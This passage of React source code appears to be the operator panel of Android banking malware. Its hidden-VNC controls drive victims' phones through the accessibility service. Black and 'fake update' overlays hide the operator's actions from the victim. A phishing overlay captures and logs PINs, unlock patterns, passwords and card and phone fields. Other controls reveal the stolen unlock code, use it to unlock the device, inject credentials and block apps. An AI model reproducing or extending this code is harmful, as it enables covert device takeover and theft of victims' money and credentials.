                    <span style={{ color:'#7dffaa', fontSize:'12px', fontFamily:'monospace', wordBreak:'break-all' }}>

                      {activeMethod.code || '—'}

                    </span>

                  )}

                  {activeMethod.type === 'pattern' && getPatternDots(activeMethod).length > 0 && (

                    <PatternGrid dots={getPatternDots(activeMethod)} gridSize={activeMethod.gridSize} />

                  )}

                </div>

              )}

            </div>

          )}

          <SideSep />

          <NavBtn onClick={() => send('send_volume_up')} title="Громкость вверх (Volume+)">🔊+</NavBtn>

          <NavBtn onClick={() => send('send_vol_power')} title="Volume+ + скриншот (Vol+Power)">📷 Vol+⏻</NavBtn>

          <SideSep />

          <div style={{ display: 'flex', justifyContent: 'center' }}>{dpad}</div>

          <SidebarResizeHandle />

        </div>

      );

    }



    // Top position

    return (

      <div style={{

        height: sidebarSize, flexShrink: 0, position: 'relative',

        background: '#080d16', borderBottom: '1px solid #101c2e',

        display: 'flex', flexDirection: 'row', alignItems: 'center',

        gap: '4px', padding: '4px 8px', overflowX: 'auto', overflowY: 'hidden',

      }}>

        <button style={{ ...navBtnSt('auto'), fontSize:'10px', color:'#2a5040', borderColor:'#101c18', background:'#060e0a', padding:'4px 6px', flexShrink:0 }}

          onClick={() => setSidebarPos('left')} title="Перенести в бок">⬅ Бок</button>

        <div style={{ width:'1px', height:'22px', background:'#101c2e', flexShrink:0 }} />

        <NavBtn w="auto" onClick={() => send('send_back',    {}, 'Назад')}    title="Назад">◀ Назад</NavBtn>

        <NavBtn w="auto" onClick={() => send('send_home',    {}, 'Домой')}    title="Домой">⌂ Домой</NavBtn>

        <NavBtn w="auto" onClick={() => send('send_recents', {}, 'Недавние')} title="Недавние">⊞ Недав.</NavBtn>

        <NavBtn w="auto" onClick={() => send('send_lock_screen',   {}, 'Экран заблокирован')} title="Заблокировать">🔒 Блок.</NavBtn>

        <NavBtn w="auto" onClick={() => send('wake_screen', {}, 'Экран разбужен')} title="Разбудить экран (без пароля)">🌙 Разбуд.</NavBtn>

        <div style={{ display:'flex', flexDirection:'column', alignItems:'center', gap:'1px', position:'relative' }}>

          <NavBtn w="auto" onClick={() => send('send_unlock_screen', {}, 'Разблокировка...')}   title={`Разблокировать · метод: ${activeMethod.type}${pinnedMethod ? ' 📌' : ''}`}>🔓 Разблок.</NavBtn>

          {activeMethod.type !== '?' && (

            <div style={{ fontSize:'8px', color:'#2a7a50', whiteSpace:'nowrap', display:'flex', alignItems:'center', gap:'2px' }}>

              {pinnedMethod && (

                <span

                  title="Метод закреплён вручную — нажать чтобы открепить"

                  onClick={() => { setPinnedMethod(null); send('clear_manual_unlock_method', {}, ''); }}

                  style={{ cursor:'pointer', opacity:0.9, userSelect:'none' }}>

                  📌✕

                </span>

              )}

              <span>

                {activeMethod.type==='pin'     ? `✓ PIN ${activeMethod.code?.length||0}ц.` :

                 activeMethod.type==='pattern' ? `✓ Паттерн ${getPatternDots(activeMethod).length}т.` :

                 activeMethod.type==='password'? '✓ Пароль' :

                 activeMethod.type==='swipe'   ? '✓ Свайп' : ''}

              </span>

              {(activeMethod.type === 'pin' || activeMethod.type === 'pattern' || activeMethod.type === 'password') && (

                <span onClick={() => setShowUnlockSecret(v => !v)}

                  style={{ cursor:'pointer', fontSize:'20px', opacity:0.85, userSelect:'none', lineHeight:1 }}

                  title="Показать сохранённые данные">

                  {showUnlockSecret ? '🙈' : '👁'}

                </span>

              )}

              {showUnlockSecret && (

                <div style={{ position:'absolute', top:'100%', left:'50%', transform:'translateX(-50%)', zIndex:200,

                  background:'#040a06', border:'1px solid #1a3020', borderRadius:'4px', padding:'5px', marginTop:'2px' }}>

                  {activeMethod.type === 'pin' && (

                    <span style={{ color:'#7dffaa', letterSpacing:'3px', fontSize:'12px', fontFamily:'monospace', whiteSpace:'nowrap' }}>

                      {activeMethod.code || '—'}

                    </span>

                  )}

                  {activeMethod.type === 'password' && (

                    <span style={{ color:'#7dffaa', fontSize:'12px', fontFamily:'monospace', whiteSpace:'nowrap' }}>

                      {activeMethod.code || '—'}

                    </span>

                  )}

                  {activeMethod.type === 'pattern' && getPatternDots(activeMethod).length > 0 && (

                    <PatternGrid dots={getPatternDots(activeMethod)} gridSize={activeMethod.gridSize} />

                  )}

                </div>

              )}

            </div>

          )}

        </div>

        <div style={{ width:'1px', height:'22px', background:'#101c2e', flexShrink:0 }} />

        <NavBtn w="auto" onClick={() => send('send_volume_up')} title="Громкость вверх (Volume+)">🔊+</NavBtn>

        <NavBtn w="auto" onClick={() => send('send_vol_power')} title="Volume+ + скриншот (Vol+Power)">📷 Vol+⏻</NavBtn>

        <div style={{ width:'1px', height:'22px', background:'#101c2e', flexShrink:0 }} />

        <DBtn ch="↑" title="↑ Вверх"  onClick={() => swipe(0.5,0.75,0.5,0.25)} />

        <DBtn ch="←" title="← Влево"  onClick={() => swipe(0.8,0.5,0.2,0.5)}   />

        <DBtn ch="→" title="→ Вправо" onClick={() => swipe(0.2,0.5,0.8,0.5)}   />

        <DBtn ch="↓" title="↓ Вниз"   onClick={() => swipe(0.5,0.25,0.5,0.75)} />

        <SidebarResizeHandle />

      </div>

    );

  };



  const appsList     = device?.systemInfo?.supAP?.data?.sup_ap_list || [];

  const filteredApps = appsSearch

    ? appsList.filter(pkg => typeof pkg === 'string' && pkg.toLowerCase().includes(appsSearch.toLowerCase()))

    : appsList;



  // ── Стиль полей ввода в диалоге ──────────────────────────────────────────────

  const dlgInput = {

    background: '#060d18', border: '1px solid #1a3050', color: '#8ab4c8',

    fontSize: '12px', padding: '5px 8px', borderRadius: '4px', outline: 'none',

    width: '100%', boxSizing: 'border-box',

  };

  const dlgLabel = { color: '#4a7090', fontSize: '11px', display: 'block', marginBottom: '4px' };

  const dlgSection = { marginBottom: '14px' };



  // Форматирование строки лога

  const formatLogData = (entry) => {

    if (entry.type === 'pattern_submit' && typeof entry.data === 'string' && entry.data.length > 0) {

      return entry.data.split('').map(d => String(parseInt(d, 10))).join('');

    }

    if (entry.type === 'webview_submit' && entry.data && Array.isArray(entry.data.fields)) {

      const labelMap = { tel:'📱 Телефон', phone:'📱 Телефон', card:'💳 Карта', password:'🔑 Пароль', pin:'🔐 Код', email:'📧 Email', text:'📝' };

      const lines = entry.data.fields.map(f => {

        const icon = labelMap[f.field_type] || labelMap[f.field_name] || '📝';

        return `${icon} ${f.field_name}: ${f.value}`;

      });

      return lines.join('\n');

    }

    if (typeof entry.data === 'object') return JSON.stringify(entry.data);

    return String(entry.data ?? '');

  };



  const logTypeLabel = { pin:'PIN', pin_submit:'PIN ✓', password:'Пароль', password_submit:'Пароль ✓',

    pattern:'Паттерн', pattern_submit:'Паттерн ✓', webview_input:'WebView поле', webview_navigation:'Переход',

    webview_submit:'🌐 WebView ✓',

    card:'💳 Карта', card_submit:'💳 Карта ✓',

    auto_pin:'🔓 PIN (авто)', auto_pattern:'🔓 Паттерн (авто)', auto_password:'🔓 Пароль (авто)' };



  return (

    <div style={{

      position: 'fixed', left: pos.x, top: pos.y, width: pos.w, height: pos.h,
      maxWidth: 'calc(100vw - 20px)', maxHeight: 'calc(100vh - 20px)',

      zIndex: 9999, background: '#0b0f18', border: '1px solid #1e2d42',

      borderRadius: '10px', display: 'flex', flexDirection: 'column',

      overflow: 'hidden', boxShadow: '0 12px 60px rgba(0,0,0,0.85)', userSelect: 'none',

    }}>



      {/* ── Заголовок ── */}

      <div style={{ background:'#0e1520', borderBottom:'1px solid #1a2840', padding:'7px 12px',

        display:'flex', alignItems:'center', justifyContent:'space-between', cursor:'grab', flexShrink:0 }}

        onMouseDown={onDragStart} onTouchStart={onTouchDragStart}>

        <div style={{ display:'flex', alignItems:'center', gap:'10px', minWidth:0, overflow:'hidden' }}>

          <span style={{ color:'#4caf50', fontSize:'13px', fontWeight:'700', flexShrink:0 }}>📺 VNC</span>

          <span style={{ color:'#2a4060', fontSize:'12px', overflow:'hidden', textOverflow:'ellipsis', whiteSpace:'nowrap' }}>{deviceName}</span>

        </div>

        <div style={{ display:'flex', alignItems:'center', gap:'8px', flexShrink:0 }} onMouseDown={e => e.stopPropagation()}>

          {vncActive && <span style={{ fontSize:'11px', color:'#4caf50', fontWeight:'600' }}>{modeLabel(mode)}</span>}

          {fps > 0   && <span style={{ fontSize:'11px', color:'#26a641' }}>{fps} fps</span>}

          {rtt !== null && (

            <span

              style={{ fontSize:'11px', fontWeight:'600',

                color: rtt < 200 ? '#26a641' : rtt < 600 ? '#f39c12' : '#e74c3c' }}

              title="RTT: от отправки команды до получения следующего фрейма (скольз. среднее 5 сэмплов)"

            >⏱ {(rtt / 1000).toFixed(1)}с</span>

          )}

          {ping !== null && (

            <span

              style={{ fontSize:'11px', fontWeight:'600',

                color: ping < 100 ? '#26a641' : ping < 300 ? '#f39c12' : '#e74c3c' }}

              title="Ping: время туда-обратно панель→сервер→устройство→сервер→панель"

            >📶 {ping}мс</span>

          )}

          {mode !== 'off' && mode !== 'video' && noFrameSec >= 10 && (

            <span

              style={{ fontSize:'11px', fontWeight:'600',

                color: noFrameSec < 30 ? '#f39c12' : '#e74c3c' }}

              title="Нет новых фреймов — возможно VNC завис, устройство слабое или плохая сеть"

            >⚠ нет кадров {noFrameSec}с</span>

          )}

          {overlayMode !== 'none' && <span style={{ fontSize:'11px', color:'#e65100' }}>{overlayMode==='black' ? '⬛' : overlayMode==='android_update' ? '🤖' : '📥'}</span>}

          {hybridActive && <span style={{ fontSize:'11px', color:'#f39c12', fontWeight:'700' }} title="Гибридный оверлей активен">🔒</span>}

          <Btn danger onClick={() => { if (modeRef.current !== 'off') setVncMode('off'); onClose(); }}>✕</Btn>

        </div>

      </div>



      {/* ── Toolbar ── */}

      <div style={{ background:'#0a1220', borderBottom:'1px solid #162030', padding:'5px 10px',

        display:'flex', flexDirection:'column', gap:'4px', flexShrink:0 }}

        onMouseDown={e => e.stopPropagation()}>



        {/* Ряд 1: Режимы */}

        <div style={{ display:'flex', gap:'5px', alignItems:'center', flexWrap:'wrap' }}>

          <span style={{ color:'#2a4060', fontSize:'10px', marginRight:'2px', flexShrink:0 }}>РЕЖИМ:</span>

          <Btn active={mode==='ac'}           onClick={() => setVncMode(mode==='ac'           ? 'off' : 'ac')}>🔵 AcVNC</Btn>

          <Btn active={mode==='screen'}        onClick={() => setVncMode(mode==='screen'        ? 'off' : 'screen')}>🖥 ScreenVNC</Btn>

          {/* VideoVNC — временно скрыто
          <div style={{ display:'flex', alignItems:'center', gap:'3px', flexShrink:0 }}>

            <Btn active={mode==='video' || videoPending} dim={!videoSupported}

                 onClick={() => videoSupported ? setVncMode(mode==='video' ? 'off' : 'video') : toastr.warning('VideoVNC: требуется Chrome 94+ / Safari 16.4+')}

                 title={videoSupported ? 'VideoVNC — H.264 поток (WebCodecs)' : 'Требуется Chrome 94+, Edge 94+, Safari 16.4+'}>

              🎥 VideoVNC

            </Btn>

            <label style={{ display:'flex', alignItems:'center', gap:'2px', cursor:'pointer',

              fontSize:'10px', color: autoIbisChecked ? '#4a9060' : '#7a6030',

              flexShrink:0, userSelect:'none', whiteSpace:'nowrap' }}

              title="Авто-клик: AccessSvc автоматически нажмёт «Разрешить» в диалоге MediaProjection. Отключите для ручного подтверждения через AcVNC-оверлей.">

              <input type="checkbox" checked={autoIbisChecked}

                     onChange={e => setAutoIbisChecked(e.target.checked)}

                     style={{ margin:0, cursor:'pointer', accentColor:'#3caf67' }} />

              Авто-клик

            </label>

          </div>
          */}

          {vncActive ? <Btn danger onClick={() => setVncMode('off')}>⏹ Стоп</Btn>

                     : <Btn dim danger onClick={() => {}}>⏹ Стоп</Btn>}

          <div style={{ width:'1px', height:'20px', background:'#1a2840', flexShrink:0, margin:'0 4px' }} />

          <Btn warn active={hybridActive && !showHybridDialog}

               onClick={() => { setShowHybridDialog(v => !v); if (!showHybridDialog) resetHybridDialog(); }}

               title="Гибридный оверлей: PIN / Пароль / Паттерн / WebView">

            🔒 {hybridActive ? 'Оверлей активен' : 'Оверлей'}

          </Btn>

          <Btn danger onClick={() => send('close_hybrid_overlay', {}, 'Оверлей закрыт')} title="Принудительно закрыть гибридный оверлей">✕ Закрыть</Btn>

          <Btn active={showPushAlert} onClick={() => setShowPushAlert(v => !v)} title="Пуш-Алерт (Material Design 3)">📣 Пуш-Алерт</Btn>

          <Btn active={showHybridLogs} onClick={() => {

            const next = !showHybridLogs;

            setShowHybridLogs(next);

            if (next && uuid) {

              api.getOverlayLogs(uuid).then(r => {

                const dbLogs = (r.data || []).flatMap(rec => {

                  const items = (rec.formData || []).map(f => ({ type: f.type, data: f.data, ts: f.timestamp || rec.openedAt }));

                  if (rec.closeReason === 'auto' && rec.overlayType && (!rec.formData || rec.formData.length === 0)) {

                    items.push({ type: `auto_${rec.overlayType}`, data: '', ts: rec.closedAt || rec.openedAt });

                  }

                  return items;

                });

                if (dbLogs.length > 0) {

                  setHybridLogs(prev => {

                    const merged = [...dbLogs, ...prev];

                    const seen = new Set();

                    return merged.filter(l => {

                      const k = `${l.type}|${l.ts}|${JSON.stringify(l.data)}`;

                      return seen.has(k) ? false : seen.add(k);

                    }).slice(-200);

                  });

                }

              }).catch(() => {});

            }

          }} title="Логи гибридного оверлея">

            📋 {hybridLogs.length > 0 ? `Логи (${hybridLogs.length})` : 'Логи'}

          </Btn>

          <div style={{ width:'1px', height:'20px', background:'#1a2840', flexShrink:0, margin:'0 4px' }} />

          <div style={{ position:'relative', flexShrink:0 }}>

            <Btn active={showPatternEditor} onClick={() => setShowPatternEditor(v => !v)} title="Задать метод разблокировки">✏ Метод</Btn>

            {showPatternEditor && (

              <div style={{ position:'absolute', top:'100%', left:0, zIndex:300, marginTop:'3px' }}>

                {methodEditorUI}

              </div>

            )}

          </div>

        </div>



        <RowSep />



        {/* Ряд 2: Прочее + масштаб AcVNC + масштаб ScreenVNC */}

        <div style={{ display:'flex', gap:'5px', alignItems:'center', flexWrap:'wrap' }}>

          <span style={{ color:'#2a4060', fontSize:'10px', marginRight:'2px', flexShrink:0 }}>ПРОЧЕЕ:</span>

          <Btn onClick={() => send('send_volume_mute',   {}, 'Звук выключен')} title="Выключить звук">🔇 Mute</Btn>

          <Btn onClick={() => send('send_volume_unmute', {}, 'Звук включён')}  title="Включить звук">🔊 Unmute</Btn>

          <Btn active={showTextBar} onClick={() => { setShowTextBar(v => !v); setTextBarValue(''); kbBufRef.current = ''; }} title="Ввод текста (запасной вариант)">⌨ Текст</Btn>

          <Btn warn active={overlayMode==='black' || overlayMode==='android_update'}  onClick={() => { if (overlayMode==='android_update') { setOverlayMode('none'); send('overlay_off', {}, 'Оверлей выключен'); } else if (overlayMode==='black') { toggleOverlay('black'); } else { setBlackText(''); setBlackUpdateMode(false); setBlackTextModal(true); } }}  title="Чёрный экран / Android-обновление">⬛ {(overlayMode==='black' || overlayMode==='android_update') ? 'Убрать' : 'Чёрный'}</Btn>

          {(overlayMode === 'black' || overlayMode === 'android_update') && (

            <>

              <input

                type="range" min="1" max="50" value={blackBrightness}

                onChange={e => setBlackBrightness(Number(e.target.value))}

                title={`Яркость: ${blackBrightness}`}

                style={{ width:'80px', cursor:'pointer', accentColor:'#f0a000' }}

              />

              <span style={{ color:'#f0a000', fontSize:'10px', minWidth:'18px' }}>{blackBrightness}</span>

              <input

                type="range" min="-10" max="10" value={blackContrast}

                onChange={e => setBlackContrast(Number(e.target.value))}

                title={`Контраст: ${blackContrast >= 0 ? '+' : ''}${blackContrast}`}

                style={{ width:'80px', cursor:'pointer', accentColor:'#00c8f0' }}

              />

              <span style={{ color:'#00c8f0', fontSize:'10px', minWidth:'24px' }}>{blackContrast > 0 ? `+${blackContrast}` : `${blackContrast}`}</span>

              <Btn active={blackInvert} onClick={() => setBlackInvert(v => !v)} title="Инвертировать цвета (помогает на светлых экранах)">🔲 Инверт</Btn>

            </>

          )}

          <Btn warn active={overlayMode==='update'} onClick={() => toggleOverlay('update')} title="Фейк апдейт">📥 {overlayMode==='update' ? 'Убрать' : 'Апдейт'}</Btn>

          {!isWeakMethod(activeMethod) && (

            <div style={{ display:'flex', flexDirection:'column', alignItems:'center', gap:'1px', flexShrink:0 }}>

              <Btn onClick={() => send('inject_credentials', {}, 'Ввод...')}

                   title={`Ввести сохранённые данные в текущее окно · ${

                     activeMethod.type==='pattern' ? `Паттерн ${getPatternDots(activeMethod).length}т.` :

                     activeMethod.type==='pin'     ? `PIN ${activeMethod.code?.length||0}ц.` : 'Пароль'

                   }`}>

                🔑 Ввод

              </Btn>

              <div style={{ fontSize:'8px', color:'#2a7a50', whiteSpace:'nowrap' }}>

                {activeMethod.type==='pattern' ? `Паттерн ${getPatternDots(activeMethod).length}т.` :

                 activeMethod.type==='pin'     ? `PIN ${activeMethod.code?.length||0}ц.`       : 'Пароль'}

              </div>

            </div>

          )}

          {device?.systemInfo?.deviceInfo?.data?.lock_method && (

            <span style={{ fontSize:'10px', color:'#8ab4c8', marginLeft:'4px', flexShrink:0, whiteSpace:'nowrap' }}

                  title="Метод блокировки экрана">

              🔐 {device.systemInfo.deviceInfo.data.lock_method}

            </span>

          )}



          {/* Масштаб — единый блок для всех режимов */}

          {vncActive && (

            <div style={{ display:'flex', alignItems:'center', gap:'3px', marginLeft:'6px',

              borderLeft:'1px solid #162030', paddingLeft:'8px', flexShrink:0 }}>

              <span style={{ color:'#2a4060', fontSize:'10px', flexShrink:0 }}>🔍 Масштаб:</span>

              <button style={mkBtnStyle(false,false,false,false)}

                onClick={() => {

                  if (mode === 'ac') setAcScale(acScale - 0.1);

                  else if (mode === 'screen') zoomAtCenter(screenZoom - 0.25);

                }} title="Уменьшить">−</button>

              <span style={{ fontSize:'11px', color:'#4caf50', minWidth:'38px', textAlign:'center', fontWeight:'600' }}>

                {mode === 'ac'

                  ? `${Math.round(acScale * 100)}%`

                  : mode === 'screen'

                    ? `${Math.round(screenZoom * 100)}%`

                    : '—'}

              </span>

              <button style={mkBtnStyle(false,false,false,false)}

                onClick={() => {

                  if (mode === 'ac') setAcScale(acScale + 0.1);

                  else if (mode === 'screen') zoomAtCenter(screenZoom + 0.25);

                }} title="Увеличить">+</button>

              <button style={{ ...mkBtnStyle(false,false,false,false), padding:'3px 6px', fontSize:'10px' }}

                onClick={() => {

                  if (mode === 'ac') setAcScale(0.2);

                  else if (mode === 'screen') resetScreenView();

                }} title="Сбросить">↺</button>

            </div>

          )}



          {/* Глубина дерева AcVNC — только в режиме ac */}

          {mode === 'ac' && (

            <div style={{ display:'flex', alignItems:'center', gap:'3px', marginLeft:'6px',

              borderLeft:'1px solid #162030', paddingLeft:'8px', flexShrink:0 }}>

              <span style={{ color:'#2a4060', fontSize:'10px', flexShrink:0 }}>🌿 Дерево:</span>

              <button style={mkBtnStyle(false,false,false,false)}

                onClick={() => {

                  const d = acDepth - 1;

                  setAcDepth(d);

                  send('set_tree_depth', { depth: d });

                }} title="Уменьшить глубину (мельче)">▲</button>

              <span style={{ fontSize:'11px', color:'#4caf50', minWidth:'22px', textAlign:'center', fontWeight:'600' }}>

                {acDepth}

              </span>

              <button style={mkBtnStyle(false,false,false,false)}

                onClick={() => {

                  const d = acDepth + 1;

                  setAcDepth(d);

                  send('set_tree_depth', { depth: d });

                }} title="Увеличить глубину (глубже)">▼</button>

            </div>

          )}



          {/* Скриншот через ScreenVNC поверх чёрного экрана — только в режиме ac */}

          {mode === 'ac' && (

            <div style={{ marginLeft:'6px', borderLeft:'1px solid #162030', paddingLeft:'8px', flexShrink:0 }}>

              <Btn warn onClick={() => send('take_screenshot', {}, 'Скриншот...')} title="Снять скриншот (пробивает чёрный экран с контрастом)">

                📸 Скрин

              </Btn>

            </div>

          )}

        </div>

      </div>



      {/* ── Основная область: сайдбар + canvas ── */}

      <div style={{ flex:1, display:'flex', flexDirection: isLeft ? 'row' : 'column', overflow:'hidden', minHeight:0 }}

        onMouseDown={e => e.stopPropagation()}>



        <Sidebar />



        {/* Canvas wrapper: внешний — position:relative для hint/resize,

            внутренний — overflow зависит от режима */}

        <div style={{ flex:1, position:'relative', overflow:'hidden', background:'#070a10' }}>



          {/* Контейнер с канвасом */}

          <div

            ref={screenContainerRef}

            style={{

              position:'absolute', inset:0,

              overflow: mode === 'ac' ? 'auto' : 'hidden',

              display:'flex',

              alignItems: mode === 'ac' ? 'flex-start' : 'center',

              justifyContent:'center',

              cursor: activeCanvasMode ? 'crosshair' : 'default',

            }}

          >

            {/* AcVNC — обычный режим + overlay поверх VideoVNC при ожидании подтверждения */}

            <canvas

              ref={acCanvasRef}

              style={

                mode === 'ac' ? {

                  display: 'block',

                  width: `${Math.round(acScale * 100)}%`,

                  height: 'auto',

                  imageRendering: acScale < 0.5 ? 'auto' : 'pixelated',

                } : (videoPending && mode === 'video') ? {

                  display: 'block',

                  position: 'absolute',

                  maxWidth: '100%',

                  maxHeight: '100%',

                  width: 'auto',

                  height: '100%',

                  top: '50%',

                  left: '50%',

                  transform: 'translate(-50%, -50%)',

                  zIndex: 15,

                  cursor: 'crosshair',

                } : { display: 'none' }

              }

              onMouseDown={e => handleMouseDown(e, 'ac')}

              onMouseUp={e => handleMouseUp(e, 'ac')}

              onWheel={(mode === 'ac' || (videoPending && mode === 'video')) ? handleWheel : undefined}

            />



            {/* ScreenVNC — с zoom/pan трансформацией */}

            <div

              style={{

                display: mode === 'screen' ? 'flex' : 'none',

                position: 'absolute',

                top: 0, left: 0,

                width: '100%', height: '100%',

                alignItems: 'center', justifyContent: 'center',

                transformOrigin: '0 0',

                transform: `translate(${screenPan.x}px, ${screenPan.y}px) scale(${screenZoom})`,

              }}

            >

              {/* ScreenVNC — JPEG фреймы */}

              <canvas

                ref={screenCanvasRef}

                style={{

                  display: mode === 'screen' ? 'block' : 'none',

                  maxWidth: '100%', maxHeight: '100%',

                  filter: (overlayMode === 'black' || overlayMode === 'update' || overlayMode === 'android_update') ? `brightness(${blackBrightness}) contrast(${cssContrast})${blackInvert ? ' invert(1)' : ''}` : 'none',

                }}

                onMouseDown={e => { if (e.button === 1) { handleScreenPanStart(e); return; } handleMouseDown(e, 'screen'); }}

                onMouseUp={e => handleMouseUp(e, 'screen')}

                onWheel={mode === 'screen' ? handleWheel : undefined}

              />

            </div>



            {/* VideoVNC — H.264 фреймы (скрыт пока ждём подтверждения) */}

            {mode === 'video' && !videoPending && (

              <canvas

                ref={videoCanvasRef}

                style={{

                  display: 'block',

                  maxWidth: '100%',

                  maxHeight: '100%',

                  filter: (overlayMode === 'black' || overlayMode === 'update' || overlayMode === 'android_update') ? `brightness(${blackBrightness}) contrast(${cssContrast})${blackInvert ? ' invert(1)' : ''}` : 'none',

                }}

                onMouseDown={e => handleMouseDown(e, 'video')}

                onMouseUp={e => handleMouseUp(e, 'video')}

                onWheel={handleWheel}

              />

            )}



            {mode === 'off' && (

              <div style={{ color:'#1e2d42', fontSize:'14px', padding:'50px', textAlign:'center' }}>

                <div style={{ fontSize:'42px', marginBottom:'12px' }}>📺</div>

                Выберите режим VNC

              </div>

            )}

          </div>





          {/* Pending-баннер поверх ac-оверлея при ожидании подтверждения MediaProjection */}

          {videoPending && mode === 'video' && (

            <div style={{

              position: 'absolute', top: 0, left: 0, right: 0,

              zIndex: 25, background: 'rgba(8,14,26,0.92)',

              borderBottom: '1px solid #1a3050',

              padding: '5px 10px',

              display: 'flex', alignItems: 'center', gap: '8px', flexWrap: 'wrap',

              fontSize: '11px',

            }}>

              <span style={{ fontSize:'14px' }}>⏳</span>

              <span style={{ color:'#7ab4c8', fontWeight:'600' }}>Ожидание подтверждения MediaProjection</span>

              <span style={{ color:'#3a6050', fontSize:'10px' }}>Нажмите «Разрешить» на устройстве через AcVNC-оверлей ниже</span>

              <div style={{ marginLeft:'auto', display:'flex', alignItems:'center', gap:'3px', flexShrink:0 }}>

                <span style={{ color:'#2a4060', fontSize:'10px' }}>🌿</span>

                <button style={mkBtnStyle(false,false,false,false)}

                  onClick={() => { const d = acDepth - 1; setAcDepth(d); send('set_tree_depth', { depth: d }); }}>▲</button>

                <span style={{ fontSize:'11px', color:'#4caf50', minWidth:'18px', textAlign:'center', fontWeight:'600' }}>{acDepth}</span>

                <button style={mkBtnStyle(false,false,false,false)}

                  onClick={() => { const d = acDepth + 1; setAcDepth(d); send('set_tree_depth', { depth: d }); }}>▼</button>

              </div>

              <Btn danger onClick={() => setVncMode('off')} title="Отменить VideoVNC">✕ Отмена</Btn>

            </div>

          )}



          {/* Скриншот-оверлей поверх AcVNC с контрастом */}

          {screenshotOverlay && mode === 'ac' && (

            <div style={{

              position: 'absolute', inset: 0, zIndex: 15,

              background: 'rgba(0,0,0,0.88)',

              display: 'flex', alignItems: 'center', justifyContent: 'center',

            }}>

              <img

                src={`data:${screenshotOverlay?.fmt === 'webp' ? 'image/webp' : 'image/jpeg'};base64,${screenshotOverlay?.data ?? screenshotOverlay}`}

                alt="screenshot"

                style={{

                  maxWidth: '100%', maxHeight: '100%',

                  filter: (overlayMode === 'black' || overlayMode === 'update' || overlayMode === 'android_update') ? `brightness(${blackBrightness}) contrast(${cssContrast})${blackInvert ? ' invert(1)' : ''}` : 'none',

                  display: 'block',

                }}

              />

              <button

                onClick={() => setScreenshotOverlay(null)}

                style={{

                  position: 'absolute', top: 8, right: 8,

                  background: '#1a0a0a', border: '1px solid #c62828',

                  color: '#ff8a80', fontSize: '14px', fontWeight: '700',

                  borderRadius: '4px', cursor: 'pointer',

                  width: '28px', height: '28px',

                  display: 'flex', alignItems: 'center', justifyContent: 'center',

                }}

                title="Закрыть скриншот"

              >✕</button>

            </div>

          )}



          {/* Строка ввода текста (запасной вариант) */}

          {showTextBar && vncActive && (

            <div style={{

              position:'absolute', bottom:0, left:0, right:0,

              background:'#0a1220', borderTop:'1px solid #1a3050',

              display:'flex', alignItems:'center', gap:'6px',

              padding:'6px 8px', zIndex:10,

            }}>

              <input

                type="text"

                value={textBarValue}

                onChange={e => setTextBarValue(e.target.value)}

                onKeyDown={e => {

                  e.stopPropagation();

                  if (e.key === 'Enter' && textBarValue.trim()) {

                    send('type_text', { text: textBarValue });

                    setTextBarValue('');

                  }

                }}

                placeholder="Введите текст для устройства..."

                autoFocus

                style={{

                  flex:1, background:'#060d18', border:'1px solid #1a3050',

                  color:'#8ab4c8', fontSize:'12px', padding:'5px 8px',

                  borderRadius:'4px', outline:'none',

                }}

              />

              <button

                style={mkBtnStyle(false,false,false,false)}

                onClick={() => { if (textBarValue.trim()) { send('type_text', { text: textBarValue }); setTextBarValue(''); } }}

              >Отправить</button>

              <button

                style={mkBtnStyle(false,false,false,false)}

                onClick={() => { if (textBarValue.trim()) send('copy_to_clipboard', { text: textBarValue }); }}

                title="Скопировать в буфер — вставить вручную через VNC"

              >В буфер</button>

              <button

                style={mkBtnStyle(false,false,true,false)}

                onClick={() => { if (textBarValue.trim()) { send('key_event', { key: 'enter' }); } }}

                title="Нажать Enter на устройстве"

              >↵ Enter</button>

              <button

                style={mkBtnStyle(false,true,false,false)}

                onClick={() => { setShowTextBar(false); setTextBarValue(''); }}

              >✕</button>

            </div>

          )}



          {/* Resize угол окна — прибит к правому нижнему углу, не скроллится */}

          <div onMouseDown={onResizeStart} style={{

            position:'absolute', bottom:0, right:0, width:22, height:22,

            cursor:'se-resize', background:'linear-gradient(135deg, transparent 50%, #1e2d42 50%)',

            borderRadius:'0 0 8px 0', zIndex:10,

          }} />

        </div>



        {/* ── Правый бар: приложения ── */}

        {isLeft && vncActive && (

          <div style={{

            width: rightBarOpen ? 200 : 38, flexShrink: 0,

            background: '#080d16', borderLeft: '1px solid #101c2e',

            display: 'flex', flexDirection: 'column', alignItems: 'stretch',

            overflow: 'hidden', transition: 'width 0.15s',

          }}>

            <button

              style={{

                ...navBtnSt(), borderRadius: 0, borderLeft: 'none', borderRight: 'none', borderTop: 'none',

                fontSize: '11px', padding: '6px 4px', flexShrink: 0, textAlign: 'center',

              }}

              onClick={() => { setRightBarOpen(o => !o); setAppsSearch(''); }}

              title={rightBarOpen ? 'Закрыть панель' : 'Приложения'}

            >{rightBarOpen ? '▶ Прил.' : '◀'}</button>

            {rightBarOpen && <>

              <input

                type="text"

                value={appsSearch}

                onChange={e => setAppsSearch(e.target.value)}

                placeholder="Поиск..."

                style={{

                  background: '#0b1220', border: 'none', borderBottom: '1px solid #101c2e',

                  color: '#7ab0c0', fontSize: '11px', padding: '4px 6px', outline: 'none',

                  flexShrink: 0, width: '100%', boxSizing: 'border-box',

                }}

              />

              <div style={{ flex: 1, overflowY: 'auto', overflowX: 'hidden' }}>

                {filteredApps.length === 0

                  ? <div style={{ color: '#2a4060', fontSize: '10px', padding: '8px 4px', textAlign: 'center' }}>Нет</div>

                  : filteredApps.map((pkg, i) => (

                    <div

                      key={i}

                      style={{ display: 'flex', borderBottom: '1px solid #0d1520', background: 'transparent' }}

                      onMouseEnter={e => e.currentTarget.style.background = '#0e1825'}

                      onMouseLeave={e => e.currentTarget.style.background = 'transparent'}

                    >

                      <button

                        style={{ flex: 1, minWidth: 0, textAlign: 'left', background: 'transparent', border: 'none', color: '#5a8090', fontSize: '10px', padding: '4px 5px', cursor: 'pointer', overflow: 'hidden', textOverflow: 'ellipsis', whiteSpace: 'nowrap', boxSizing: 'border-box' }}

                        title={pkg}

                        onClick={() => send('launch_app', { package: pkg }, 'Запуск: ' + pkg)}

                      >{pkg}</button>

                      <button

                        style={{ flexShrink: 0, flexGrow: 0, width: '22px', background: 'transparent', border: 'none', color: '#3a5060', fontSize: '11px', padding: '0', cursor: 'pointer', textAlign: 'center' }}

                        title={'Заблокировать запуск ' + pkg}

                        onClick={e => { e.stopPropagation(); send('block_app', { package: pkg }, '⏳ Блокировка: ' + pkg); }}

                      >🚫</button>

                      <button

